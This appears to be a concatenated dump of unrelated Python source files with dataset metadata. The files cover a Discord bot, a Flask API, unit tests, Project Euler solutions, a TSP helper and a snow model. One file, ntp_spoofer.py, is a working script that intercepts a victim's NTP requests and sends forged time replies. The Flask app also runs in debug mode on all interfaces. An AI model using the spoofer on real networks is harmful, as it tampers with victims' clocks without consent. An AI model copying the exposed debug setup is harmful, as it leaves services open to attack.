await ctx.send("4. Please enter the title of the plot")
msg = await client.wait_for("message", check=check)
title = msg.content
await ctx.send("5. Please enter the name of x-axis")
msg = await client.wait_for("message", check=check)
x_name = msg.content
await ctx.send("6. Please enter the name of y-axis")
msg = await client.wait_for("message", check=check)
y_name = msg.content
plt.plot(x, y, linestyle="-" if graph_type == 'b' else 'none', marker='.')
plt.title(title)
plt.xlabel(x_name)
plt.ylabel(y_name)
plt.savefig('plot.png')
await ctx.send(file=discord.File('plot.png'))
os.remove('plot.png')
plt.clf()
# experimental
@client.command(name='when')
async def when(ctx):
await ctx.send(start_time.strftime("**Bot started from %Y-%m-%d %I-%M %p**"))
# experimental
@client.command(name='dm')
async def dm(ctx, userid, *message):
try:
userid = int(userid)
user = await client.fetch_user(userid)
await user.send(' '.join(message))
await ctx.send("**Message sent successfully**")
except:
await ctx.send("**Message is not sent**")
if MODE == 1:
keep_alive() # For setting up bot on replit.com
start_time = datetime.now(tz)
client.run(token)
| 37.563506
| 194
| 0.595247
| 0
| 0
| 0
| 0
| 15,558
| 0.738396
| 16,501
| 0.783151
| 6,691
| 0.317561
|
558d879413f6f88e3c45e2ca06534a675e1043f9
| 480
|
py
|
Python
|
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
solutions/1281-subtract-the-product-and-sum-of-digits-of-an-integer.py
|
lk-hang/leetcode
|
4c8735463bdcb9f48666e03a39eb03ee9f625cec
|
[
"MIT"
] | null | null | null |
"""
Given an integer number n, return the difference between the product of its digits and the sum of its digits.
"""
class Solution:
def subtractProductAndSum(self, n: int) -> int:
if n < 10:
return 0
running_prod = 1
running_sum = 0
while n > 0:
rest = n % 10
running_prod *= rest
running_sum += rest
n = n // 10
return running_prod - running_sum
| 25.263158
| 109
| 0.522917
| 352
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 117
| 0.24375
|
558e58ba058923b58851710da67bc2d4ad87a57f
| 1,031
|
py
|
Python
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 2
|
2021-07-11T06:03:43.000Z
|
2021-10-09T23:37:21.000Z
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 6
|
2021-09-08T03:07:13.000Z
|
2022-03-12T00:57:07.000Z
|
VideoIndexerDemo/VideoIndexer/application.py
|
microsoft/ai4accessibility
|
4c13d006f285e31f01d1bc71a55c20e9234713a5
|
[
"MIT"
] | 3
|
2021-02-14T18:51:31.000Z
|
2021-02-14T18:51:41.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from dotenv import load_dotenv
load_dotenv()
import os
import json
import requests
from concurrent.futures import ThreadPoolExecutor
from flask import Flask, flash, request, redirect, url_for, session
from video_captioning.main import upload_video, video_callback, train_custom_speech
executor = ThreadPoolExecutor(max_workers=20)
app = Flask("layout_detection")
@app.route('/api/v1/vc', methods=['POST'])
def vc_upload():
params = request.get_json()
return_data = upload_video(params)
return json.dumps(return_data)
@app.route('/api/v1/customspeech', methods=['POST'])
def customspeech_train():
params = request.get_json()
return_data = train_custom_speech(params)
return json.dumps(return_data)
@app.route('/api/v1/vc/callback', methods=['POST'])
def vc_callback():
params = request.get_json()
return video_callback(request.args.get('id'))
if __name__ == "__main__":
app.run(port=5000, debug=True, host='0.0.0.0')
| 29.457143
| 83
| 0.747818
| 0
| 0
| 0
| 0
| 508
| 0.492726
| 0
| 0
| 185
| 0.179437
|
559154d893c3d43225a58bc587edd3aa01dea828
| 5,154
|
py
|
Python
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | 3
|
2020-04-28T08:53:14.000Z
|
2020-12-17T14:25:32.000Z
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | 2
|
2020-03-06T15:00:22.000Z
|
2020-06-26T11:21:52.000Z
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-cybercrime-tracker
|
28fcfaa220025c9e8523633a4a9a04f319656756
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from requests.exceptions import SSLError
from pytest import fixture
from unittest import mock
from tests.unit.mock_for_tests import (
CYBERCRIME_RESPONSE_MOCK,
EXPECTED_DELIBERATE_RESPONSE,
EXPECTED_OBSERVE_RESPONSE,
EXPECTED_RESPONSE_500_ERROR,
EXPECTED_RESPONSE_404_ERROR,
CYBERCRIME_ERROR_RESPONSE_MOCK,
EXPECTED_RESPONSE_SSL_ERROR
)
def routes():
yield '/deliberate/observables'
yield '/observe/observables'
@fixture(scope='module', params=routes(), ids=lambda route: f'POST {route}')
def route(request):
return request.param
@fixture(scope='function')
def cybercrime_api_request():
with mock.patch('requests.get') as mock_request:
yield mock_request
def cybercrime_api_response(*, ok, payload=None, status_error=None):
mock_response = mock.MagicMock()
mock_response.ok = ok
if ok and not payload:
payload = CYBERCRIME_RESPONSE_MOCK
else:
mock_response.status_code = status_error
mock_response.json = lambda: payload
return mock_response
@fixture(scope='module')
def invalid_json():
return [{'type': 'unknown', 'value': ''}]
def test_enrich_call_with_invalid_json_failure(route, client, invalid_json):
response = client.post(route, json=invalid_json)
assert response.status_code == HTTPStatus.OK
@fixture(scope='module')
def valid_json():
return [{'type': 'ip', 'value': '104.24.123.62'}]
@fixture(scope='module')
def valid_json_multiple():
return [
{'type': 'ip', 'value': '104.24.123.62'},
{'type': 'ip', 'value': '0.0.0.0'},
]
def test_enrich_call_success(route, client, valid_json,
cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(ok=True)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
data = response.get_json()
if route == '/observe/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
judgements = data['data']['judgements']
assert judgements['docs'][0].pop('id')
assert judgements['docs'][0].pop('valid_time')
assert data == EXPECTED_OBSERVE_RESPONSE
if route == '/deliberate/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
assert data == EXPECTED_DELIBERATE_RESPONSE
def test_enrich_error_with_data(route, client, valid_json_multiple,
cybercrime_api_request):
cybercrime_api_request.side_effect = (
cybercrime_api_response(ok=True),
cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.INTERNAL_SERVER_ERROR)
)
response = client.post(route, json=valid_json_multiple)
assert response.status_code == HTTPStatus.OK
data = response.get_json()
if route == '/observe/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
judgements = data['data']['judgements']
assert judgements['docs'][0].pop('id')
assert judgements['docs'][0].pop('valid_time')
expected_response = {}
expected_response.update(EXPECTED_OBSERVE_RESPONSE)
expected_response.update(EXPECTED_RESPONSE_500_ERROR)
assert data == expected_response
if route == '/deliberate/observables':
verdicts = data['data']['verdicts']
assert verdicts['docs'][0].pop('valid_time')
expected_response = {}
expected_response.update(EXPECTED_DELIBERATE_RESPONSE)
expected_response.update(EXPECTED_RESPONSE_500_ERROR)
assert data == expected_response
def test_enrich_call_404(route, client, valid_json, cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.NOT_FOUND
)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_404_ERROR
def test_enrich_call_500(route, client, valid_json, cybercrime_api_request):
cybercrime_api_request.return_value = cybercrime_api_response(
ok=False,
payload=CYBERCRIME_ERROR_RESPONSE_MOCK,
status_error=HTTPStatus.INTERNAL_SERVER_ERROR
)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_500_ERROR
def test_enrich_call_with_ssl_error(route, client,
valid_json, cybercrime_api_request):
mock_exc = mock.MagicMock()
mock_exc.reason.args.__getitem__().verify_message \
= 'self signed certificate'
cybercrime_api_request.side_effect = SSLError(mock_exc)
response = client.post(route, json=valid_json)
assert response.status_code == HTTPStatus.OK
assert response.get_json() == EXPECTED_RESPONSE_SSL_ERROR
| 29.451429
| 76
| 0.695188
| 0
| 0
| 191
| 0.037059
| 607
| 0.117773
| 0
| 0
| 579
| 0.11234
|
55915bb2fe7f5c79e7cd44acfd89dd079dc66443
| 2,658
|
py
|
Python
|
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
Python/Euler 01 - 10.py
|
jiegillet/project-euler
|
3b530e11af00e9d9eccb7aa41ed8018ee6d7b472
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
"""
untitled.py
Created by Jérémie on 2013-10-26.
Copyright (c) 2013 __MyCompanyName__. All rights reserved.
"""
"""
# Problem 1
lim=1000
s=0
for i in range(lim):
if i%3==0 or i%5==0:
s+=i
print s
print sum([x for x in range(1000) if x % 3== 0 or x % 5== 0])
"""
"""
# Problem 2
lim=4000000
f1,f2,s=1,1,0
while f2<lim:
f1,f2=f2,f1+f2
if f2%2==0: s+=f2
print s
"""
""""
# Problem 3
num=600851475143
while num>1:
div=2
while num%div!=0 and div!=num:
div+=1
num/=div
print div
"""
"""
# Problem 4
max=0
for i in range(999,99,-1):
for j in range(999,i-99,-1):
if str(i*j)==str(i*j)[::-1] and i>max:
max=i*j
print max
"""
"""
# Problem 5
print 2**4*3**2*5*7*11*13*17*19
"""
"""
# Problem 6
print sum(range(1,101))**2- sum([e**2 for e in range(1,101)])
"""
"""
# Problem 7
primes=[2,3]
n=3
# while len(primes)<10001:
# n+=2
# if not 0 in [n%p for p in primes]:
# primes.append(n)
# print primes[-1] # 45 seconds
while len(primes)<100001:
n+=2
p=True
for p in primes:
if p*p>n: break
if n%p==0: p=False; break
if p: primes.append(n)
print primes[-1] # .3 seconds for 10001 # 6 second for 100001
"""
"""
# Problem 8
num=str(7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450)
print max( int(num[i])*int(num[i+1])*int(num[i+2])*int(num[i+3])*int(num[i+4]) for i in range(len(num)-4))
"""
"""
# Problem 9
sol=0
for i in range(1000,2,-1):
for j in range(i-1,2,-1):
if i**2==j**2+(1000-i-j)**2:
sol=i*j*(1000-i-j)
break
if sol>0: break
print sol
"""
#Problem 10
primes=[2,3]
n=3
while primes[-1]<2E6:
n+=2
p=True
for p in primes:
if p*p>n: break
if n%p==0: p=False; break
if p: primes.append(n)
print sum(primes)-primes[-1]
| 25.557692
| 1,009
| 0.748683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,470
| 0.928571
|
5593fe3d21ad82b5382d08854df0a8f99eec0ed9
| 1,900
|
py
|
Python
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 73
|
2015-05-12T13:12:11.000Z
|
2021-12-21T11:44:29.000Z
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 90
|
2015-06-23T11:11:35.000Z
|
2021-03-31T22:09:15.000Z
|
src/ensae_teaching_cs/tests/american_cities.py
|
Jerome-maker/ensae_teaching_cs
|
43ea044361ee60c00c85aea354a7b25c21c0fd07
|
[
"MIT"
] | 65
|
2015-01-13T08:23:55.000Z
|
2022-02-11T22:42:07.000Z
|
"""
@file
@brief Function to test others functionalities
"""
import os
import pandas
from pyquickhelper.loghelper import fLOG
from ..faq.faq_matplotlib import graph_cities
from ..special import tsp_kruskal_algorithm, distance_haversine
def american_cities(df_or_filename, nb_cities=-1, img=None, fLOG=fLOG):
"""
Computes the :epkg:`TSP` for american cities.
@param df_or_filename dataframe
@param nb_cities number of cities to keep
@param img image to produce
@param fLOG logging function
@return dataframe (results)
"""
def haversine(p1, p2):
return distance_haversine(p1[0], p1[1], p2[0], p2[1])
if isinstance(df_or_filename, str):
df = pandas.read_csv(df_or_filename)
else:
df = df_or_filename
df["Longitude"] = -df["Longitude"]
df = df[df.Latitude < 52]
df = df[df.Longitude > -130].copy()
fLOG(df.columns)
df = df.dropna()
if nb_cities > 0:
df = df[:nb_cities].copy()
fLOG(df.shape)
points = [(row[1], row[2], row[3])
for row in df.itertuples(index=False)]
fLOG("number of cities:", len(points))
trip = tsp_kruskal_algorithm(
points, distance=haversine, fLOG=fLOG, max_iter=10)
# trip
dftrip = pandas.DataFrame(
trip, columns=["Latitude", "Longitude", "City"])
# graph
for i in range(0, dftrip.shape[0]):
if i % 10 != 0:
dftrip.loc[i, "City"] = ""
if img is not None:
import matplotlib.pyplot as plt
fig, ax = graph_cities(dftrip, markersize=3, linked=True, fLOG=fLOG,
fontcolor="red", fontsize='16', loop=True, figsize=(32, 32))
assert ax is not None
fig.savefig(img)
assert os.path.exists(img)
plt.close('all')
fLOG("end")
return dftrip
| 29.6875
| 91
| 0.596316
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 479
| 0.252105
|
55948a0d8acfcbe1f96f58b36c1bb83505bd04f6
| 175
|
py
|
Python
|
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
first_task.py
|
yashika0607/Task1_python
|
4a867227f48f0c8ed9ad418fb412550eef3a7571
|
[
"Apache-2.0"
] | null | null | null |
#task 1
r=float(input("Enter the radius of the circle?\n"))
pi=3.143
area=pi*r*r
print("Area of the circle is ",area)
#task 2
x=input("Enter the file name\n")
print(x+".py")
| 17.5
| 51
| 0.674286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 101
| 0.577143
|
5594b24c92581e7c3ba26f490dea8b770f2cf8fd
| 2,049
|
py
|
Python
|
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
tools/ntp_spoofer.py
|
dschoonwinkel/pypacker
|
58c833f40207db746b0b2995ca3835a533e0258e
|
[
"BSD-3-Clause"
] | null | null | null |
"""Simple NTP spoofing tool."""
from pypacker.layer12.ethernet import Ethernet
from pypacker.layer3 import ip
from pypacker.layer4.udp import UDP
from pypacker.layer567 import ntp
from pypacker import psocket
# interface to listen on
IFACE = "wlan0"
# source address which commits a NTP request and we send a wrong answer
IP_SRC = "192.168.178.27"
#
# normal NTP request
#
"""
psock_req = psocket.SocketHndl(iface_name=IFACE, mode=psocket.SocketHndl.MODE_LAYER_3)
ntp_req = ip.IP(src_s=IP_SRC, dst_s="188.138.9.208", p=ip.IP_PROTO_UDP) +\
UDP(sport=1234, dport=123) +\
ntp.NTP(li=ntp.NO_WARNING, v=3, mode=ntp.CLIENT)
print("sending NTP request and waiting for answer..")
answer = psock_req.sr(ntp_req)[0][ntp.NTP]
"""
# print("answer is: %s" % answer)
#unpack_I = struct.Struct(">I").unpack
# print("seconds since 1.1.1900: %d" % unpack_I(answer.transmit_time[0:4])[0])
# psock_req.close()
#
# spoof NTP response
#
print("waiting for NTP request")
psock = psocket.SocketHndl(iface_name=IFACE, timeout=600)
filter = lambda p: p[ntp.NTP] is not None and p[ip.IP].src_s == IP_SRC
answer = psock.recvp(filter_match_recv=filter)[0]
answer_ntp = answer[ntp.NTP]
print("got NTP packet: %s" % answer_ntp)
ntp_answer_send = Ethernet(dst=answer[Ethernet].src, src=answer[Ethernet].dst) +\
ip.IP(src=answer[ip.IP].dst, dst_s=IP_SRC, p=ip.IP_PROTO_UDP) +\
UDP(sport=answer[UDP].dport, dport=answer[UDP].sport) +\
ntp.NTP(li=ntp.NO_WARNING, v=3, mode=ntp.SERVER, stratum=2, interval=4,
update_time=answer_ntp.transmit_time,
originate_time=answer_ntp.transmit_time,
receive_time=b"\x00" * 4 + answer_ntp.transmit_time[4:],
transmit_time=b"\x00" * 4 + answer_ntp.transmit_time[4:])
# alternative packet creation
"""
ntp_answer_send = answer.create_reverse()
layer_ntp = ntp_answer_send[ntp.NTP]
layer_ntp.mode = ntp.SERVER
layer_ntp.originate_time = answer_ntp.transmit_time
layer_ntp.receive_time = layer_ntp.transmit_time = b"\x00"*4 + answer_ntp.transmit_time[4:]
"""
psock.send(ntp_answer_send.bin())
psock.close()
| 32.52381
| 91
| 0.736945
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,061
| 0.517814
|
5594c3feafec578628223eff5ebd91b66138d3a5
| 7,524
|
py
|
Python
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 4
|
2019-08-26T09:50:26.000Z
|
2022-03-02T16:11:17.000Z
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 5
|
2021-03-31T19:55:34.000Z
|
2021-04-01T08:29:53.000Z
|
motsfinder/exprs/test_basics.py
|
daniel-dpk/distorted-motsfinder-public
|
8c2eec174c755c55b26b568243e58c2956a35257
|
[
"MIT"
] | 1
|
2019-09-18T14:15:33.000Z
|
2019-09-18T14:15:33.000Z
|
#!/usr/bin/env python3
from __future__ import print_function
from builtins import range, map
import unittest
import sys
import pickle
import numpy as np
from mpmath import mp
from testutils import DpkTestCase
from .numexpr import NumericExpression
from .numexpr import isclose
from .basics import OffsetExpression, DivisionExpression, SimpleSinExpression
from .basics import SimpleCoshExpression
class _TestExpr1(NumericExpression):
def __init__(self, a=1, **kw):
super(_TestExpr1, self).__init__(**kw)
self.a = a
def _expr_str(self): return "a x**2, where a=%r" % self.a
def _evaluator(self, use_mp):
a = self.a
return (lambda x: a*x**2, lambda x: 2*a*x, lambda x: 2*a, self.zero)
class _TestExpr2(NumericExpression):
def __init__(self, expr, a=1):
super(_TestExpr2, self).__init__(x=expr)
self.a = a
def _expr_str(self):
return "a/x, where a=%r, x=%s" % (self.a, self.x.str())
def _evaluator(self, use_mp):
a = self.a
x = self.x.evaluator(use_mp)
def f(t):
return a/x(t)
def df(t):
return -x.diff(t)*a/x(t)**2
def ddf(t):
xt = x(t)
dxt = x.diff(t, 1)
ddxt = x.diff(t, 2)
return a*(-ddxt/xt**2 + 2*dxt**2/xt**3)
return (f, df, ddf)
class _TestExpr3(NumericExpression):
def __init__(self, expr1, expr2, a=1, b=1):
super(_TestExpr3, self).__init__(x1=expr1, x2=expr2)
self.a = a
self.b = b
def _expr_str(self):
return ("a x1 + b x2, where a=%r, b=%r, x1=%s, x2=%s"
% (self.a, self.b, self.x1.str(), self.x2.str()))
def _evaluator(self, use_mp):
a, b = self.a, self.b
x1, x2 = self.x1.evaluator(use_mp), self.x2.evaluator(use_mp)
return (lambda t: a*x1(t) + b*x2(t), lambda t: a*x1.diff(t) + b*x2.diff(t))
class _TestExprDomain(NumericExpression):
def __init__(self, domain):
super(_TestExprDomain, self).__init__(domain=domain)
self.__domain = domain
def get_domain(self): return self.__domain
def _expr_str(self): return "id"
def _evaluator(self, use_mp): return (lambda x: x, lambda x: 1, self.zero)
class TestIsclose(DpkTestCase):
def test_float(self):
self.assertTrue(isclose(1e7+1, 1e7+1, rel_tol=0, abs_tol=0))
self.assertTrue(isclose(1e7+1, 1e7, rel_tol=1e-6))
self.assertFalse(isclose(1e7+1, 1e7, rel_tol=1e-8))
self.assertTrue(isclose(1e7+1, 1e7, rel_tol=0, abs_tol=2.0))
self.assertFalse(isclose(1e7+1, 1e7, rel_tol=0, abs_tol=0.5))
def test_mpmath(self):
with mp.workdps(30):
a = mp.mpf('1e7') + mp.mpf('1e-20')
b = mp.mpf('1e7')
self.assertTrue(isclose(a, a, rel_tol=0, abs_tol=0, use_mp=True))
self.assertFalse(isclose(a, b, use_mp=True))
with mp.workdps(26):
self.assertTrue(isclose(a, b, use_mp=True))
self.assertTrue(isclose(a, b, rel_tol=1e-26, abs_tol=0, use_mp=True))
self.assertFalse(isclose(a, b, rel_tol=1e-28, abs_tol=0, use_mp=True))
self.assertTrue(isclose(a, b, rel_tol=0, abs_tol=1e-19, use_mp=True))
self.assertFalse(isclose(a, b, rel_tol=0, abs_tol=1e-21, use_mp=True))
class TestNumexpr(DpkTestCase):
def test_expressions(self):
expr = _TestExpr2(_TestExpr1())
self.assertEqual(repr(expr), "<_TestExpr2(a/x, where a=1, x=(a x**2, where a=1))>")
self.assertEqual(expr.a, 1)
expr.a = 5
self.assertEqual(expr.a, 5)
def test_name(self):
expr = _TestExpr1()
self.assertEqual(expr.name, "_TestExpr1")
expr.name = "foo"
self.assertEqual(expr.name, "foo")
def test_pickle(self):
a = 1.5
expr = _TestExpr2(_TestExpr1(-1), a=a)
expr.name = "foo"
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertIs(type(expr), _TestExpr2)
self.assertEqual(expr.a, 1.5)
self.assertIs(type(expr.x), _TestExpr1)
self.assertEqual(expr.x.a, -1)
self.assertEqual(expr.name, "foo")
def test_pickle_domain(self):
expr = _TestExpr1(domain=(0, 1))
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertEqual(expr.domain, (0, 1))
expr = _TestExpr1(domain=(0, mp.pi))
s = pickle.dumps(expr)
expr = pickle.loads(s)
self.assertEqual(expr.domain, (0, mp.pi))
def test_evaluators(self):
a = 1.5
expr = _TestExpr2(_TestExpr1(), a=a)
f = expr.evaluator()
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f(t), a/t**2)
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f.diff(t), -2*a/t**3)
for t in np.linspace(0.1, 2, 4):
self.assertAlmostEqual(f.diff(t, 2), 6*a/t**4)
with self.assertRaises(NotImplementedError):
f.diff(0, 3)
def test_string_clashing(self):
expr1 = _TestExpr1(a=1)
expr2 = _TestExpr2(2, a=3)
comp1 = _TestExpr3(expr1, expr2)
expr2 = _TestExpr2(2, a=1)
expr1 = _TestExpr1(a=3)
comp2 = _TestExpr3(expr1, expr2)
e1 = comp1.evaluator()
e2 = comp2.evaluator()
# The expressions are different:
self.assertNotEqual(e1(.5), e2(.5))
# Their string are different too:
self.assertNotEqual(repr(comp1), repr(comp2))
def test_domain(self):
expr = _TestExprDomain([-1, 1])
e = expr.evaluator()
self.assertTrue(hasattr(e, 'domain'))
self.assertFalse(hasattr(e, 'domainX'))
self.assertEqual(e.domain[0], -1)
self.assertEqual(e.domain[1], 1)
expr = _TestExprDomain(([-1, 1], [0, 10]))
e = expr.evaluator()
self.assertTrue(hasattr(e, 'domain'))
self.assertEqual(e.domainX[0], -1)
self.assertEqual(e.domainX[1], 1)
self.assertEqual(e.domainY[0], 0)
self.assertEqual(e.domainY[1], 10)
f = e.function()
self.assertTrue(hasattr(f, 'domain'))
self.assertTrue(hasattr(f, 'domainX'))
self.assertTrue(hasattr(f, 'domainY'))
self.assertFalse(hasattr(f, 'domainZ'))
class TestOffsetExpression(DpkTestCase):
def test_offset(self):
expr = OffsetExpression(_TestExpr1(), 1.0)
e = expr.evaluator()
self.assertAlmostEqual(e(0), 1.0)
self.assertAlmostEqual(e(1), 2.0)
self.assertAlmostEqual(e(2), 5.0)
self.assertAlmostEqual(e.diff(0), 0.0)
self.assertAlmostEqual(e.diff(1), 2.0)
self.assertAlmostEqual(e.diff(2), 4.0)
self.assertAlmostEqual(e.diff(1, 2), 2.0)
class TestDivisionExpression(DpkTestCase):
def test_division(self):
expr = DivisionExpression(
SimpleSinExpression(),
OffsetExpression(SimpleCoshExpression(), 2),
)
with mp.workdps(30):
f = expr.evaluator(use_mp=True)
space = mp.linspace(0, mp.pi, 10)
for n in range(1, 5):
self.assertListAlmostEqual(
[f.diff(x, n) for x in space],
[mp.diff(f, x, n) for x in space],
delta=1e-28,
)
def run_tests():
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
return len(unittest.TextTestRunner(verbosity=2).run(suite).failures)
if __name__ == '__main__':
unittest.main()
| 34.356164
| 91
| 0.591042
| 6,885
| 0.915072
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.046651
|
559516145d3a91e65f7eba170cf38f3e8329840b
| 468
|
py
|
Python
|
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | 7
|
2020-05-10T09:57:23.000Z
|
2021-03-27T11:55:07.000Z
|
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | null | null | null |
python/Data Structures and Algorithms in Python Book/oop/fibonacciprogression.py
|
gauravssnl/Data-Structures-and-Algorithms
|
1c335c72ce514d4f95090241bbd6edf01a1141a8
|
[
"MIT"
] | 3
|
2021-03-27T03:42:57.000Z
|
2021-08-09T12:03:41.000Z
|
from progression import Progression
class FibonacciProgression(Progression):
def __init__(self, first=0, second=1):
super().__init__(start=first)
self._previous = second - first
def _advance(self):
self._previous, self._current = self._current, self._previous + self._current
if __name__ == "__main__":
    fibonacci_progression = FibonacciProgression(first=1, second=2)
    fibonacci_progression.print_progression(20)
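# A minimal, self-contained sketch of the same recurrence (it does not depend on
# the Progression base class, so the starting values below are illustrative):
# each step replaces (previous, current) with (current, previous + current),
# which is exactly what _advance() does above.
def _fibonacci_terms_sketch(first=1, second=2, count=10):
    previous, current = second - first, first
    terms = []
    for _ in range(count):
        terms.append(current)
        previous, current = current, previous + current
    return terms

# _fibonacci_terms_sketch(1, 2, 6) -> [1, 2, 3, 5, 8, 13]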
| 29.25
| 85
| 0.713675
| 281
| 0.600427
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.021368
|
55966e42aa982766be05f8a6dbd86f8df5f992eb
| 18,587
|
py
|
Python
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 3
|
2021-05-28T06:46:36.000Z
|
2021-06-14T13:39:25.000Z
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 22
|
2021-04-28T12:31:58.000Z
|
2022-03-09T18:29:12.000Z
|
openamundsen/modules/snow/multilayermodel.py
|
openamundsen/openamundsen
|
2ac09eb34b0c72c84c421a0dac08d114a05b7b1c
|
[
"MIT"
] | 1
|
2021-06-01T12:48:54.000Z
|
2021-06-01T12:48:54.000Z
|
import numpy as np
from numba import njit, prange
from openamundsen import constants, constants as c, heatconduction
from openamundsen.snowmodel import SnowModel
from . import snow
class MultilayerSnowModel(SnowModel):
def __init__(self, model):
self.model = model
s = model.state.snow
num_snow_layers = len(model.config.snow.min_thickness)
s.add_variable('num_layers', '1', 'Number of snow layers', dtype=int, retain=True)
s.add_variable('thickness', 'm', 'Snow thickness', dim3=num_snow_layers, retain=True)
s.add_variable('density', 'kg m-3', 'Snow density', 'snow_density', dim3=num_snow_layers)
s.add_variable('ice_content', 'kg m-2', 'Ice content of snow', dim3=num_snow_layers, retain=True)
s.add_variable('liquid_water_content', 'kg m-2', 'Liquid water content of snow', 'liquid_water_content_of_snow_layer', dim3=num_snow_layers, retain=True)
s.add_variable('temp', 'K', 'Snow temperature', dim3=num_snow_layers, retain=True)
s.add_variable('therm_cond', 'W m-1 K-1', 'Thermal conductivity of snow', dim3=num_snow_layers, retain=True)
s.add_variable('heat_cap', 'J K-1 m-2', 'Areal heat capacity of snow', dim3=num_snow_layers)
def initialize(self):
roi = self.model.grid.roi
s = self.model.state.snow
s.swe[roi] = 0
s.depth[roi] = 0
s.area_fraction[roi] = 0
s.num_layers[roi] = 0
s.sublimation[roi] = 0
s.therm_cond[:, roi] = self.model.config.snow.thermal_conductivity
s.thickness[:, roi] = 0
